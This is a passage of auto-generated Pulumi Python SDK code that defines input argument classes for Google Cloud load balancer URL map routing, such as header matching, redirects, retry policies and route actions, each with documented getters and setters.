:param pulumi.Input[Sequence[pulumi.Input['HttpHeaderOptionArgs']]] response_headers_to_add: Headers to add the response before sending the response back to the client.
:param pulumi.Input[Sequence[pulumi.Input[str]]] response_headers_to_remove: A list of header names for headers that need to be removed from the response before sending the response back to the client.
"""
if request_headers_to_add is not None:
pulumi.set(__self__, "request_headers_to_add", request_headers_to_add)
if request_headers_to_remove is not None:
pulumi.set(__self__, "request_headers_to_remove", request_headers_to_remove)
if response_headers_to_add is not None:
pulumi.set(__self__, "response_headers_to_add", response_headers_to_add)
if response_headers_to_remove is not None:
pulumi.set(__self__, "response_headers_to_remove", response_headers_to_remove)
@property
@pulumi.getter(name="requestHeadersToAdd")
def request_headers_to_add(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['HttpHeaderOptionArgs']]]]:
"""
Headers to add to a matching request before forwarding the request to the backendService.
"""
return pulumi.get(self, "request_headers_to_add")
@request_headers_to_add.setter
def request_headers_to_add(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['HttpHeaderOptionArgs']]]]):
pulumi.set(self, "request_headers_to_add", value)
@property
@pulumi.getter(name="requestHeadersToRemove")
def request_headers_to_remove(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
"""
A list of header names for headers that need to be removed from the request before forwarding the request to the backendService.
"""
return pulumi.get(self, "request_headers_to_remove")
@request_headers_to_remove.setter
def request_headers_to_remove(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "request_headers_to_remove", value)
@property
@pulumi.getter(name="responseHeadersToAdd")
def response_headers_to_add(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['HttpHeaderOptionArgs']]]]:
"""
Headers to add the response before sending the response back to the client.
"""
return pulumi.get(self, "response_headers_to_add")
@response_headers_to_add.setter
def response_headers_to_add(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['HttpHeaderOptionArgs']]]]):
pulumi.set(self, "response_headers_to_add", value)
@property
@pulumi.getter(name="responseHeadersToRemove")
def response_headers_to_remove(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
"""
A list of header names for headers that need to be removed from the response before sending the response back to the client.
"""
return pulumi.get(self, "response_headers_to_remove")
@response_headers_to_remove.setter
def response_headers_to_remove(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "response_headers_to_remove", value)
@pulumi.input_type
class HttpHeaderMatchArgs:
def __init__(__self__, *,
exact_match: Optional[pulumi.Input[str]] = None,
header_name: Optional[pulumi.Input[str]] = None,
invert_match: Optional[pulumi.Input[bool]] = None,
prefix_match: Optional[pulumi.Input[str]] = None,
present_match: Optional[pulumi.Input[bool]] = None,
range_match: Optional[pulumi.Input['Int64RangeMatchArgs']] = None,
regex_match: Optional[pulumi.Input[str]] = None,
suffix_match: Optional[pulumi.Input[str]] = None):
"""
matchRule criteria for request header matches.
:param pulumi.Input[str] exact_match: The value should exactly match contents of exactMatch. Only one of exactMatch, prefixMatch, suffixMatch, regexMatch, presentMatch or rangeMatch must be set.
:param pulumi.Input[str] header_name: The name of the HTTP header to match. For matching against the HTTP request's authority, use a headerMatch with the header name ":authority". For matching a request's method, use the headerName ":method". When the URL map is bound to a target gRPC proxy that has the validateForProxyless field set to true, only non-binary user-specified custom metadata and the `content-type` header are supported. The following transport-level headers cannot be used in header matching rules: `:authority`, `:method`, `:path`, `:scheme`, `user-agent`, `accept-encoding`, `content-encoding`, `grpc-accept-encoding`, `grpc-encoding`, `grpc-previous-rpc-attempts`, `grpc-tags-bin`, `grpc-timeout` and `grpc-trace-bin`.
:param pulumi.Input[bool] invert_match: If set to false, the headerMatch is considered a match if the preceding match criteria are met. If set to true, the headerMatch is considered a match if the preceding match criteria are NOT met. The default setting is false.
:param pulumi.Input[str] prefix_match: The value of the header must start with the contents of prefixMatch. Only one of exactMatch, prefixMatch, suffixMatch, regexMatch, presentMatch or rangeMatch must be set.
:param pulumi.Input[bool] present_match: A header with the contents of headerName must exist. The match takes place whether or not the request's header has a value. Only one of exactMatch, prefixMatch, suffixMatch, regexMatch, presentMatch or rangeMatch must be set.
:param pulumi.Input['Int64RangeMatchArgs'] range_match: The header value must be an integer and its value must be in the range specified in rangeMatch. If the header does not contain an integer, number or is empty, the match fails. For example for a range [-5, 0] - -3 will match. - 0 will not match. - 0.25 will not match. - -3someString will not match. Only one of exactMatch, prefixMatch, suffixMatch, regexMatch, presentMatch or rangeMatch must be set. rangeMatch is not supported for load balancers that have loadBalancingScheme set to EXTERNAL.
:param pulumi.Input[str] regex_match: The value of the header must match the regular expression specified in regexMatch. For more information about regular expression syntax, see Syntax. For matching against a port specified in the HTTP request, use a headerMatch with headerName set to PORT and a regular expression that satisfies the RFC2616 Host header's port specifier. Only one of exactMatch, prefixMatch, suffixMatch, regexMatch, presentMatch or rangeMatch must be set. regexMatch only applies to load balancers that have loadBalancingScheme set to INTERNAL_SELF_MANAGED.
:param pulumi.Input[str] suffix_match: The value of the header must end with the contents of suffixMatch. Only one of exactMatch, prefixMatch, suffixMatch, regexMatch, presentMatch or rangeMatch must be set.
"""
if exact_match is not None:
pulumi.set(__self__, "exact_match", exact_match)
if header_name is not None:
pulumi.set(__self__, "header_name", header_name)
if invert_match is not None:
pulumi.set(__self__, "invert_match", invert_match)
if prefix_match is not None:
pulumi.set(__self__, "prefix_match", prefix_match)
if present_match is not None:
pulumi.set(__self__, "present_match", present_match)
if range_match is not None:
pulumi.set(__self__, "range_match", range_match)
if regex_match is not None:
pulumi.set(__self__, "regex_match", regex_match)
if suffix_match is not None:
pulumi.set(__self__, "suffix_match", suffix_match)
@property
@pulumi.getter(name="exactMatch")
def exact_match(self) -> Optional[pulumi.Input[str]]:
"""
The value should exactly match contents of exactMatch. Only one of exactMatch, prefixMatch, suffixMatch, regexMatch, presentMatch or rangeMatch must be set.
"""
return pulumi.get(self, "exact_match")
@exact_match.setter
def exact_match(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "exact_match", value)
@property
@pulumi.getter(name="headerName")
def header_name(self) -> Optional[pulumi.Input[str]]:
"""
The name of the HTTP header to match. For matching against the HTTP request's authority, use a headerMatch with the header name ":authority". For matching a request's method, use the headerName ":method". When the URL map is bound to a target gRPC proxy that has the validateForProxyless field set to true, only non-binary user-specified custom metadata and the `content-type` header are supported. The following transport-level headers cannot be used in header matching rules: `:authority`, `:method`, `:path`, `:scheme`, `user-agent`, `accept-encoding`, `content-encoding`, `grpc-accept-encoding`, `grpc-encoding`, `grpc-previous-rpc-attempts`, `grpc-tags-bin`, `grpc-timeout` and `grpc-trace-bin`.
"""
return pulumi.get(self, "header_name")
@header_name.setter
def header_name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "header_name", value)
@property
@pulumi.getter(name="invertMatch")
def invert_match(self) -> Optional[pulumi.Input[bool]]:
"""
If set to false, the headerMatch is considered a match if the preceding match criteria are met. If set to true, the headerMatch is considered a match if the preceding match criteria are NOT met. The default setting is false.
"""
return pulumi.get(self, "invert_match")
@invert_match.setter
def invert_match(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "invert_match", value)
@property
@pulumi.getter(name="prefixMatch")
def prefix_match(self) -> Optional[pulumi.Input[str]]:
"""
The value of the header must start with the contents of prefixMatch. Only one of exactMatch, prefixMatch, suffixMatch, regexMatch, presentMatch or rangeMatch must be set.
"""
return pulumi.get(self, "prefix_match")
@prefix_match.setter
def prefix_match(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "prefix_match", value)
@property
@pulumi.getter(name="presentMatch")
def present_match(self) -> Optional[pulumi.Input[bool]]:
"""
A header with the contents of headerName must exist. The match takes place whether or not the request's header has a value. Only one of exactMatch, prefixMatch, suffixMatch, regexMatch, presentMatch or rangeMatch must be set.
"""
return pulumi.get(self, "present_match")
@present_match.setter
def present_match(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "present_match", value)
@property
@pulumi.getter(name="rangeMatch")
def range_match(self) -> Optional[pulumi.Input['Int64RangeMatchArgs']]:
"""
The header value must be an integer and its value must be in the range specified in rangeMatch. If the header does not contain an integer, number or is empty, the match fails. For example for a range [-5, 0] - -3 will match. - 0 will not match. - 0.25 will not match. - -3someString will not match. Only one of exactMatch, prefixMatch, suffixMatch, regexMatch, presentMatch or rangeMatch must be set. rangeMatch is not supported for load balancers that have loadBalancingScheme set to EXTERNAL.
"""
return pulumi.get(self, "range_match")
@range_match.setter
def range_match(self, value: Optional[pulumi.Input['Int64RangeMatchArgs']]):
pulumi.set(self, "range_match", value)
@property
@pulumi.getter(name="regexMatch")
def regex_match(self) -> Optional[pulumi.Input[str]]:
"""
The value of the header must match the regular expression specified in regexMatch. For more information about regular expression syntax, see Syntax. For matching against a port specified in the HTTP request, use a headerMatch with headerName set to PORT and a regular expression that satisfies the RFC2616 Host header's port specifier. Only one of exactMatch, prefixMatch, suffixMatch, regexMatch, presentMatch or rangeMatch must be set. regexMatch only applies to load balancers that have loadBalancingScheme set to INTERNAL_SELF_MANAGED.
"""
return pulumi.get(self, "regex_match")
@regex_match.setter
def regex_match(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "regex_match", value)
@property
@pulumi.getter(name="suffixMatch")
def suffix_match(self) -> Optional[pulumi.Input[str]]:
"""
The value of the header must end with the contents of suffixMatch. Only one of exactMatch, prefixMatch, suffixMatch, regexMatch, presentMatch or rangeMatch must be set.
"""
return pulumi.get(self, "suffix_match")
@suffix_match.setter
def suffix_match(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "suffix_match", value)
@pulumi.input_type
class HttpHeaderOptionArgs:
def __init__(__self__, *,
header_name: Optional[pulumi.Input[str]] = None,
header_value: Optional[pulumi.Input[str]] = None,
replace: Optional[pulumi.Input[bool]] = None):
"""
Specification determining how headers are added to requests or responses.
:param pulumi.Input[str] header_name: The name of the header.
:param pulumi.Input[str] header_value: The value of the header to add.
:param pulumi.Input[bool] replace: If false, headerValue is appended to any values that already exist for the header. If true, headerValue is set for the header, discarding any values that were set for that header. The default value is false.
"""
if header_name is not None:
pulumi.set(__self__, "header_name", header_name)
if header_value is not None:
pulumi.set(__self__, "header_value", header_value)
if replace is not None:
pulumi.set(__self__, "replace", replace)
@property
@pulumi.getter(name="headerName")
def header_name(self) -> Optional[pulumi.Input[str]]:
"""
The name of the header.
"""
return pulumi.get(self, "header_name")
@header_name.setter
def header_name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "header_name", value)
@property
@pulumi.getter(name="headerValue")
def header_value(self) -> Optional[pulumi.Input[str]]:
"""
The value of the header to add.
"""
return pulumi.get(self, "header_value")
@header_value.setter
def header_value(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "header_value", value)
@property
@pulumi.getter
def replace(self) -> Optional[pulumi.Input[bool]]:
"""
If false, headerValue is appended to any values that already exist for the header. If true, headerValue is set for the header, discarding any values that were set for that header. The default value is false.
"""
return pulumi.get(self, "replace")
@replace.setter
def replace(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "replace", value)
@pulumi.input_type
class HttpQueryParameterMatchArgs:
def __init__(__self__, *,
exact_match: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None,
present_match: Optional[pulumi.Input[bool]] = None,
regex_match: Optional[pulumi.Input[str]] = None):
"""
HttpRouteRuleMatch criteria for a request's query parameter.
:param pulumi.Input[str] exact_match: The queryParameterMatch matches if the value of the parameter exactly matches the contents of exactMatch. Only one of presentMatch, exactMatch, or regexMatch must be set.
:param pulumi.Input[str] name: The name of the query parameter to match. The query parameter must exist in the request, in the absence of which the request match fails.
:param pulumi.Input[bool] present_match: Specifies that the queryParameterMatch matches if the request contains the query parameter, irrespective of whether the parameter has a value or not. Only one of presentMatch, exactMatch, or regexMatch must be set.
:param pulumi.Input[str] regex_match: The queryParameterMatch matches if the value of the parameter matches the regular expression specified by regexMatch. For more information about regular expression syntax, see Syntax. Only one of presentMatch, exactMatch, or regexMatch must be set. regexMatch only applies when the loadBalancingScheme is set to INTERNAL_SELF_MANAGED.
"""
if exact_match is not None:
pulumi.set(__self__, "exact_match", exact_match)
if name is not None:
pulumi.set(__self__, "name", name)
if present_match is not None:
pulumi.set(__self__, "present_match", present_match)
if regex_match is not None:
pulumi.set(__self__, "regex_match", regex_match)
@property
@pulumi.getter(name="exactMatch")
def exact_match(self) -> Optional[pulumi.Input[str]]:
"""
The queryParameterMatch matches if the value of the parameter exactly matches the contents of exactMatch. Only one of presentMatch, exactMatch, or regexMatch must be set.
"""
return pulumi.get(self, "exact_match")
@exact_match.setter
def exact_match(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "exact_match", value)
@property
@pulumi.getter
def name(self) -> Optional[pulumi.Input[str]]:
"""
The name of the query parameter to match. The query parameter must exist in the request, in the absence of which the request match fails.
"""
return pulumi.get(self, "name")
@name.setter
def name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "name", value)
@property
@pulumi.getter(name="presentMatch")
def present_match(self) -> Optional[pulumi.Input[bool]]:
"""
Specifies that the queryParameterMatch matches if the request contains the query parameter, irrespective of whether the parameter has a value or not. Only one of presentMatch, exactMatch, or regexMatch must be set.
"""
return pulumi.get(self, "present_match")
@present_match.setter
def present_match(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "present_match", value)
@property
@pulumi.getter(name="regexMatch")
def regex_match(self) -> Optional[pulumi.Input[str]]:
"""
The queryParameterMatch matches if the value of the parameter matches the regular expression specified by regexMatch. For more information about regular expression syntax, see Syntax. Only one of presentMatch, exactMatch, or regexMatch must be set. regexMatch only applies when the loadBalancingScheme is set to INTERNAL_SELF_MANAGED.
"""
return pulumi.get(self, "regex_match")
@regex_match.setter
def regex_match(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "regex_match", value)
@pulumi.input_type
class HttpRedirectActionArgs:
def __init__(__self__, *,
host_redirect: Optional[pulumi.Input[str]] = None,
https_redirect: Optional[pulumi.Input[bool]] = None,
path_redirect: Optional[pulumi.Input[str]] = None,
prefix_redirect: Optional[pulumi.Input[str]] = None,
redirect_response_code: Optional[pulumi.Input['HttpRedirectActionRedirectResponseCode']] = None,
strip_query: Optional[pulumi.Input[bool]] = None):
"""
Specifies settings for an HTTP redirect.
:param pulumi.Input[str] host_redirect: The host that is used in the redirect response instead of the one that was supplied in the request. The value must be from 1 to 255 characters.
:param pulumi.Input[bool] https_redirect: If set to true, the URL scheme in the redirected request is set to HTTPS. If set to false, the URL scheme of the redirected request remains the same as that of the request. This must only be set for URL maps used in TargetHttpProxys. Setting this true for TargetHttpsProxy is not permitted. The default is set to false.
:param pulumi.Input[str] path_redirect: The path that is used in the redirect response instead of the one that was supplied in the request. pathRedirect cannot be supplied together with prefixRedirect. Supply one alone or neither. If neither is supplied, the path of the original request is used for the redirect. The value must be from 1 to 1024 characters.
:param pulumi.Input[str] prefix_redirect: The prefix that replaces the prefixMatch specified in the HttpRouteRuleMatch, retaining the remaining portion of the URL before redirecting the request. prefixRedirect cannot be supplied together with pathRedirect. Supply one alone or neither. If neither is supplied, the path of the original request is used for the redirect. The value must be from 1 to 1024 characters.
:param pulumi.Input['HttpRedirectActionRedirectResponseCode'] redirect_response_code: The HTTP Status code to use for this RedirectAction. Supported values are: - MOVED_PERMANENTLY_DEFAULT, which is the default value and corresponds to 301. - FOUND, which corresponds to 302. - SEE_OTHER which corresponds to 303. - TEMPORARY_REDIRECT, which corresponds to 307. In this case, the request method is retained. - PERMANENT_REDIRECT, which corresponds to 308. In this case, the request method is retained.
:param pulumi.Input[bool] strip_query: If set to true, any accompanying query portion of the original URL is removed before redirecting the request. If set to false, the query portion of the original URL is retained. The default is set to false.
"""
if host_redirect is not None:
pulumi.set(__self__, "host_redirect", host_redirect)
if https_redirect is not None:
pulumi.set(__self__, "https_redirect", https_redirect)
if path_redirect is not None:
pulumi.set(__self__, "path_redirect", path_redirect)
if prefix_redirect is not None:
pulumi.set(__self__, "prefix_redirect", prefix_redirect)
if redirect_response_code is not None:
pulumi.set(__self__, "redirect_response_code", redirect_response_code)
if strip_query is not None:
pulumi.set(__self__, "strip_query", strip_query)
@property
@pulumi.getter(name="hostRedirect")
def host_redirect(self) -> Optional[pulumi.Input[str]]:
"""
The host that is used in the redirect response instead of the one that was supplied in the request. The value must be from 1 to 255 characters.
"""
return pulumi.get(self, "host_redirect")
@host_redirect.setter
def host_redirect(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "host_redirect", value)
@property
@pulumi.getter(name="httpsRedirect")
def https_redirect(self) -> Optional[pulumi.Input[bool]]:
"""
If set to true, the URL scheme in the redirected request is set to HTTPS. If set to false, the URL scheme of the redirected request remains the same as that of the request. This must only be set for URL maps used in TargetHttpProxys. Setting this true for TargetHttpsProxy is not permitted. The default is set to false.
"""
return pulumi.get(self, "https_redirect")
@https_redirect.setter
def https_redirect(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "https_redirect", value)
@property
@pulumi.getter(name="pathRedirect")
def path_redirect(self) -> Optional[pulumi.Input[str]]:
"""
The path that is used in the redirect response instead of the one that was supplied in the request. pathRedirect cannot be supplied together with prefixRedirect. Supply one alone or neither. If neither is supplied, the path of the original request is used for the redirect. The value must be from 1 to 1024 characters.
"""
return pulumi.get(self, "path_redirect")
@path_redirect.setter
def path_redirect(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "path_redirect", value)
@property
@pulumi.getter(name="prefixRedirect")
def prefix_redirect(self) -> Optional[pulumi.Input[str]]:
"""
The prefix that replaces the prefixMatch specified in the HttpRouteRuleMatch, retaining the remaining portion of the URL before redirecting the request. prefixRedirect cannot be supplied together with pathRedirect. Supply one alone or neither. If neither is supplied, the path of the original request is used for the redirect. The value must be from 1 to 1024 characters.
"""
return pulumi.get(self, "prefix_redirect")
@prefix_redirect.setter
def prefix_redirect(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "prefix_redirect", value)
@property
@pulumi.getter(name="redirectResponseCode")
def redirect_response_code(self) -> Optional[pulumi.Input['HttpRedirectActionRedirectResponseCode']]:
"""
The HTTP Status code to use for this RedirectAction. Supported values are: - MOVED_PERMANENTLY_DEFAULT, which is the default value and corresponds to 301. - FOUND, which corresponds to 302. - SEE_OTHER which corresponds to 303. - TEMPORARY_REDIRECT, which corresponds to 307. In this case, the request method is retained. - PERMANENT_REDIRECT, which corresponds to 308. In this case, the request method is retained.
"""
return pulumi.get(self, "redirect_response_code")
@redirect_response_code.setter
def redirect_response_code(self, value: Optional[pulumi.Input['HttpRedirectActionRedirectResponseCode']]):
pulumi.set(self, "redirect_response_code", value)
@property
@pulumi.getter(name="stripQuery")
def strip_query(self) -> Optional[pulumi.Input[bool]]:
"""
If set to true, any accompanying query portion of the original URL is removed before redirecting the request. If set to false, the query portion of the original URL is retained. The default is set to false.
"""
return pulumi.get(self, "strip_query")
@strip_query.setter
def strip_query(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "strip_query", value)
@pulumi.input_type
class HttpRetryPolicyArgs:
def __init__(__self__, *,
num_retries: Optional[pulumi.Input[int]] = None,
per_try_timeout: Optional[pulumi.Input['DurationArgs']] = None,
retry_conditions: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None):
"""
The retry policy associates with HttpRouteRule
:param pulumi.Input[int] num_retries: Specifies the allowed number retries. This number must be > 0. If not specified, defaults to 1.
:param pulumi.Input['DurationArgs'] per_try_timeout: Specifies a non-zero timeout per retry attempt. If not specified, will use the timeout set in the HttpRouteAction field. If timeout in the HttpRouteAction field is not set, this field uses the largest timeout among all backend services associated with the route. Not supported when the URL map is bound to a target gRPC proxy that has the validateForProxyless field set to true.
:param pulumi.Input[Sequence[pulumi.Input[str]]] retry_conditions: Specifies one or more conditions when this retry policy applies. Valid values are: - 5xx: retry is attempted if the instance or endpoint responds with any 5xx response code, or if the instance or endpoint does not respond at all. For example, disconnects, reset, read timeout, connection failure, and refused streams. - gateway-error: Similar to 5xx, but only applies to response codes 502, 503 or 504. - connect-failure: a retry is attempted on failures connecting to the instance or endpoint. For example, connection timeouts. - retriable-4xx: a retry is attempted if the instance or endpoint responds with a 4xx response code. The only error that you can retry is error code 409. - refused-stream: a retry is attempted if the instance or endpoint resets the stream with a REFUSED_STREAM error code. This reset type indicates that it is safe to retry. - cancelled: a retry is attempted if the gRPC status code in the response header is set to cancelled. - deadline-exceeded: a retry is attempted if the gRPC status code in the response header is set to deadline-exceeded. - internal: a retry is attempted if the gRPC status code in the response header is set to internal. - resource-exhausted: a retry is attempted if the gRPC status code in the response header is set to resource-exhausted. - unavailable: a retry is attempted if the gRPC status code in the response header is set to unavailable. Only the following codes are supported when the URL map is bound to target gRPC proxy that has validateForProxyless field set to true. - cancelled - deadline-exceeded - internal - resource-exhausted - unavailable
"""
if num_retries is not None:
pulumi.set(__self__, "num_retries", num_retries)
if per_try_timeout is not None:
pulumi.set(__self__, "per_try_timeout", per_try_timeout)
if retry_conditions is not None:
pulumi.set(__self__, "retry_conditions", retry_conditions)
@property
@pulumi.getter(name="numRetries")
def num_retries(self) -> Optional[pulumi.Input[int]]:
"""
Specifies the allowed number retries. This number must be > 0. If not specified, defaults to 1.
"""
return pulumi.get(self, "num_retries")
@num_retries.setter
def num_retries(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "num_retries", value)
@property
@pulumi.getter(name="perTryTimeout")
def per_try_timeout(self) -> Optional[pulumi.Input['DurationArgs']]:
"""
Specifies a non-zero timeout per retry attempt. If not specified, will use the timeout set in the HttpRouteAction field. If timeout in the HttpRouteAction field is not set, this field uses the largest timeout among all backend services associated with the route. Not supported when the URL map is bound to a target gRPC proxy that has the validateForProxyless field set to true.
"""
return pulumi.get(self, "per_try_timeout")
@per_try_timeout.setter
def per_try_timeout(self, value: Optional[pulumi.Input['DurationArgs']]):
pulumi.set(self, "per_try_timeout", value)
@property
@pulumi.getter(name="retryConditions")
def retry_conditions(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
"""
Specifies one or more conditions when this retry policy applies. Valid values are: - 5xx: retry is attempted if the instance or endpoint responds with any 5xx response code, or if the instance or endpoint does not respond at all. For example, disconnects, reset, read timeout, connection failure, and refused streams. - gateway-error: Similar to 5xx, but only applies to response codes 502, 503 or 504. - connect-failure: a retry is attempted on failures connecting to the instance or endpoint. For example, connection timeouts. - retriable-4xx: a retry is attempted if the instance or endpoint responds with a 4xx response code. The only error that you can retry is error code 409. - refused-stream: a retry is attempted if the instance or endpoint resets the stream with a REFUSED_STREAM error code. This reset type indicates that it is safe to retry. - cancelled: a retry is attempted if the gRPC status code in the response header is set to cancelled. - deadline-exceeded: a retry is attempted if the gRPC status code in the response header is set to deadline-exceeded. - internal: a retry is attempted if the gRPC status code in the response header is set to internal. - resource-exhausted: a retry is attempted if the gRPC status code in the response header is set to resource-exhausted. - unavailable: a retry is attempted if the gRPC status code in the response header is set to unavailable. Only the following codes are supported when the URL map is bound to target gRPC proxy that has validateForProxyless field set to true. - cancelled - deadline-exceeded - internal - resource-exhausted - unavailable
"""
return pulumi.get(self, "retry_conditions")
@retry_conditions.setter
def retry_conditions(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "retry_conditions", value)
@pulumi.input_type
class HttpRouteActionArgs:
def __init__(__self__, *,
cors_policy: Optional[pulumi.Input['CorsPolicyArgs']] = None,
fault_injection_policy: Optional[pulumi.Input['HttpFaultInjectionArgs']] = None,
max_stream_duration: Optional[pulumi.Input['DurationArgs']] = None,
request_mirror_policy: Optional[pulumi.Input['RequestMirrorPolicyArgs']] = None,
retry_policy: Optional[pulumi.Input['HttpRetryPolicyArgs']] = None,
timeout: Optional[pulumi.Input['DurationArgs']] = None,
url_rewrite: Optional[pulumi.Input['UrlRewriteArgs']] = None,
weighted_backend_services: Optional[pulumi.Input[Sequence[pulumi.Input['WeightedBackendServiceArgs']]]] = None):
"""
:param pulumi.Input['CorsPolicyArgs'] cors_policy: The specification for allowing client-side cross-origin requests. For more information about the W3C recommendation for cross-origin resource sharing (CORS), see Fetch API Living Standard. Not supported when the URL map is bound to a target gRPC proxy.
:param pulumi.Input['HttpFaultInjectionArgs'] fault_injection_policy: The specification for fault injection introduced into traffic to test the resiliency of clients to backend service failure. As part of fault injection, when clients send requests to a backend service, delays can be introduced by a load balancer on a percentage of requests before sending those requests to the backend service. Similarly requests from clients can be aborted by the load balancer for a percentage of requests. For the requests impacted by fault injection, timeout and retry_policy is ignored by clients that are configured with a fault_injection_policy.
:param pulumi.Input['DurationArgs'] max_stream_duration: Specifies the maximum duration (timeout) for streams on the selected route. Unlike the timeout field where the timeout duration starts from the time the request has been fully processed (known as *end-of-stream*), the duration in this field is computed from the beginning of the stream until the response has been processed, including all retries. A stream that does not complete in this duration is closed. If not specified, this field uses the maximum maxStreamDuration value among all backend services associated with the route. This field is only allowed if the Url map is used with backend services with loadBalancingScheme set to INTERNAL_SELF_MANAGED.
:param pulumi.Input['RequestMirrorPolicyArgs'] request_mirror_policy: Specifies the policy on how requests intended for the route's backends are shadowed to a separate mirrored backend service. The load balancer does not wait for responses from the shadow service. Before sending traffic to the shadow service, the host / authority header is suffixed with -shadow. Not supported when the URL map is bound to a target gRPC proxy that has the validateForProxyless field set to true.
:param pulumi.Input['HttpRetryPolicyArgs'] retry_policy: Specifies the retry policy associated with this route.
:param pulumi.Input['DurationArgs'] timeout: Specifies the timeout for the selected route. Timeout is computed from the time the request has been fully processed (known as *end-of-stream*) up until the response has been processed. Timeout includes all retries. If not specified, this field uses the largest timeout among all backend services associated with the route. Not supported when the URL map is bound to a target gRPC proxy that has validateForProxyless field set to true.
:param pulumi.Input['UrlRewriteArgs'] url_rewrite: The spec to modify the URL of the request, before forwarding the request to the matched service. urlRewrite is the only action supported in UrlMaps for external HTTP(S) load balancers. Not supported when the URL map is bound to a target gRPC proxy that has the validateForProxyless field set to true.
:param pulumi.Input[Sequence[pulumi.Input['WeightedBackendServiceArgs']]] weighted_backend_services: A list of weighted backend services to send traffic to when a route match occurs. The weights determine the fraction of traffic that flows to their corresponding backend service. If all traffic needs to go to a single backend service, there must be one weightedBackendService with weight set to a non-zero number. After a backend service is identified and before forwarding the request to the backend service, advanced routing actions such as URL rewrites and header transformations are applied depending on additional settings specified in this HttpRouteAction.
"""
if cors_policy is not None:
pulumi.set(__self__, "cors_policy", cors_policy)
if fault_injection_policy is not None:
pulumi.set(__self__, "fault_injection_policy", fault_injection_policy)
if max_stream_duration is not None:
pulumi.set(__self__, "max_stream_duration", max_stream_duration)
if request_mirror_policy is not None:
pulumi.set(__self__, "request_mirror_policy", request_mirror_policy)
if retry_policy is not None:
pulumi.set(__self__, "retry_policy", retry_policy)
if timeout is not None:
pulumi.set(__self__, "timeout", timeout)
if url_rewrite is not None:
pulumi.set(__self__, "url_rewrite", url_rewrite)
if weighted_backend_services is not None:
pulumi.set(__self__, "weighted_backend_services", weighted_backend_services)
@property
@pulumi.getter(name="corsPolicy")
def cors_policy(self) -> Optional[pulumi.Input['CorsPolicyArgs']]:
"""
The specification for allowing client-side cross-origin requests. For more information about the W3C recommendation for cross-origin resource sharing (CORS), see Fetch API Living Standard. Not supported when the URL map is bound to a target gRPC proxy.
"""
return pulumi.get(self, "cors_policy")
@cors_policy.setter
def cors_policy(self, value: Optional[pulumi.Input['CorsPolicyArgs']]):
pulumi.set(self, "cors_policy", value)
@property
@pulumi.getter(name="faultInjectionPolicy")
def fault_injection_policy(self) -> Optional[pulumi.Input['HttpFaultInjectionArgs']]:
"""
The specification for fault injection introduced into traffic to test the resiliency of clients to backend service failure. As part of fault injection, when clients send requests to a backend service, delays can be introduced by a load balancer on a percentage of requests before sending those requests to the backend service. Similarly requests from clients can be aborted by the load balancer for a percentage of requests. For the requests impacted by fault injection, timeout and retry_policy is ignored by clients that are configured with a fault_injection_policy.
"""
return pulumi.get(self, "fault_injection_policy")
@fault_injection_policy.setter
def fault_injection_policy(self, value: Optional[pulumi.Input['HttpFaultInjectionArgs']]):
pulumi.set(self, "fault_injection_policy", value)
@property
@pulumi.getter(name="maxStreamDuration")
def max_stream_duration(self) -> Optional[pulumi.Input['DurationArgs']]:
"""
Specifies the maximum duration (timeout) for streams on the selected route. Unlike the timeout field where the timeout duration starts from the time the request has been fully processed (known as *end-of-stream*), the duration in this field is computed from the beginning of the stream until the response has been processed, including all retries. A stream that does not complete in this duration is closed. If not specified, this field uses the maximum maxStreamDuration value among all backend services associated with the route. This field is only allowed if the Url map is used with backend services with loadBalancingScheme set to INTERNAL_SELF_MANAGED.
"""
return pulumi.get(self, "max_stream_duration")
@max_stream_duration.setter
def max_stream_duration(self, value: Optional[pulumi.Input['DurationArgs']]):
pulumi.set(self, "max_stream_duration", value)
@property
@pulumi.getter(name="requestMirrorPolicy")
def request_mirror_policy(self) -> Optional[pulumi.Input['RequestMirrorPolicyArgs']]:
"""
Specifies the policy on how requests intended for the route's backends are shadowed to a separate mirrored backend service. The load balancer does not wait for responses from the shadow service. Before sending traffic to the shadow service, the host / authority header is suffixed with -shadow. Not supported when the URL map is bound to a target gRPC proxy that has the validateForProxyless field set to true.
"""
return pulumi.get(self, "request_mirror_policy")
@request_mirror_policy.setter
def request_mirror_policy(self, value: Optional[pulumi.Input['RequestMirrorPolicyArgs']]):
pulumi.set(self, "request_mirror_policy", value)
@property
@pulumi.getter(name="retryPolicy")
def retry_policy(self) -> Optional[pulumi.Input['HttpRetryPolicyArgs']]:
"""
Specifies the retry policy associated with this route.
"""
return pulumi.get(self, "retry_policy")
@retry_policy.setter
def retry_policy(self, value: Optional[pulumi.Input['HttpRetryPolicyArgs']]):
pulumi.set(self, "retry_policy", value)
@property
@pulumi.getter
